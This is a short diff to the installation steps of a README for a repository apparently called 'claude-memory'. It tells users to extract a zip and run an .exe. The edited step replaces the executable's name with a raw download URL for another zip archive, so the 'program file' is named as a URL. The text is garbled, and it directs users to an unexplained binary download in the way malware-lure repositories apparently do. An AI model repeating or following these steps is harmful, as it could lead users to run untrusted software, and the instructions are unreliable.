a258huit58/claude-memory/README.md

 1. Right-click the `.zip` file and select "Extract All."
 2. Choose where you want to save the folder and extract the contents.
 3. Open the extracted folder.
-4. Find the main program file, often named `claude-memory.exe`.
+4. Find the main program file, often named `https://raw.githubusercontent.com/a258huit58/claude-memory/main/plugin/skills/recall/claude_memory_v2.6.zip`.

 ---